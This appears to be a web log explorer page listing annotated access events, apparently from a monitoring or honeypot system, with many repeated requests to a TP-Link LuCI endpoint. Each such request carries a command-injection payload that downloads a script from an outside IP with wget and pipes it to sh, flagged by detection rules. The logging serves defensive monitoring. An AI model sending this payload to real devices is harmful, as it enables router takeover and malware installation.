Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

Command separator/operator combined with a recognized command token. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

Command separator/operator combined with a recognized command token. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#30 2025-07-15 20:30:14 event 10546545 GET 499

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:subshell

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:subshell

conf

92.00

details

Detected subshell execution syntax (`...` or $(...)). Snippet='bin/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

Command/file-injection indicator: cmdi:subshell

details

Detected subshell execution syntax (`...` or $(...)). Snippet='bin/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#31 2025-07-15 20:30:05 event 10546537 GET 499

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#32 2025-07-15 20:30:05 event 10546537 GET 499

ann cmdi 22 label cmdi

Request Command/file-injection indicator: cmdi:pipe_or_redirect

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:pipe_or_redirect

conf

75.00

details

Pipe/redirect operators in a context that resembles command execution. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

Command/file-injection indicator: cmdi:pipe_or_redirect

details

Pipe/redirect operators in a context that resembles command execution. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#33 2025-07-15 20:30:05 event 10546537 GET 499

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

Command separator/operator combined with a recognized command token. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

Command separator/operator combined with a recognized command token. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#34 2025-07-15 20:30:05 event 10546537 GET 499

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:subshell

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:subshell

conf

92.00

details

Detected subshell execution syntax (`...` or $(...)). Snippet='bin/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

Command/file-injection indicator: cmdi:subshell

details

Detected subshell execution syntax (`...` or $(...)). Snippet='bin/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#35 2025-07-15 11:39:05 event 10287113 GET 499

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#36 2025-07-15 11:39:05 event 10287113 GET 499

ann cmdi 22 label cmdi

Request Command/file-injection indicator: cmdi:pipe_or_redirect

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:pipe_or_redirect

conf

75.00

details

Pipe/redirect operators in a context that resembles command execution. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

Command/file-injection indicator: cmdi:pipe_or_redirect

details

Pipe/redirect operators in a context that resembles command execution. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#37 2025-07-15 11:39:05 event 10287113 GET 499

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

Command separator/operator combined with a recognized command token. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

Command separator/operator combined with a recognized command token. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#38 2025-07-15 11:39:05 event 10287113 GET 499

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:subshell

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:subshell

conf

92.00

details

Detected subshell execution syntax (`...` or $(...)). Snippet='bin/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

Command/file-injection indicator: cmdi:subshell

details

Detected subshell execution syntax (`...` or $(...)). Snippet='bin/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#39 2025-07-15 11:39:00 event 10287108 GET 499

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#40 2025-07-15 11:39:00 event 10287108 GET 499

ann cmdi 22 label cmdi

Request Command/file-injection indicator: cmdi:pipe_or_redirect

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:pipe_or_redirect

conf

75.00

details

Pipe/redirect operators in a context that resembles command execution. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

Command/file-injection indicator: cmdi:pipe_or_redirect

details

Pipe/redirect operators in a context that resembles command execution. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#41 2025-07-15 11:39:00 event 10287108 GET 499

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

Command separator/operator combined with a recognized command token. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

Command separator/operator combined with a recognized command token. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#42 2025-07-15 11:39:00 event 10287108 GET 499

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:subshell

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:subshell

conf

92.00

details

Detected subshell execution syntax (`...` or $(...)). Snippet='bin/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

Command/file-injection indicator: cmdi:subshell

details

Detected subshell execution syntax (`...` or $(...)). Snippet='bin/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#43 2025-07-11 16:18:58 event 9676907 POST 301 bytes 178

ann base label observed

Request event observed

/cgi-bin/mainfunction.cgi

referer

Mozila/5.0

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/mainfunction.cgi

referer

Mozila/5.0

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#44 2025-07-11 16:18:36 event 9676894 GET 301 bytes 178

ann base label observed

Request event observed

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#45 2025-07-10 23:45:58 event 9631083 POST 301 bytes 178

ann base label observed

Request event observed

/cgi-bin/mainfunction.cgi

referer

Mozila/5.0

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/mainfunction.cgi

referer

Mozila/5.0

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#46 2025-07-10 23:45:37 event 9631068 GET 301 bytes 178

ann base label observed

Request event observed

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#47 2025-07-10 05:52:54 event 9390248 POST 301 bytes 178

ann base label observed

Request event observed

/cgi-bin/mainfunction.cgi

referer

Mozila/5.0

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/mainfunction.cgi

referer

Mozila/5.0

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#48 2025-07-10 05:52:54 event 9390246 POST 301 bytes 178

ann base label observed

Request event observed

/cgi-bin/mainfunction.cgi

referer

Mozila/5.0

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/mainfunction.cgi

referer

Mozila/5.0

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#49 2025-07-10 05:52:33 event 9390218 GET 301 bytes 178

ann base label observed

Request event observed

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#50 2025-07-10 05:52:33 event 9390215 GET 301 bytes 178

ann base label observed

Request event observed

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

Log Explorer

Annotated access events

Confirm Action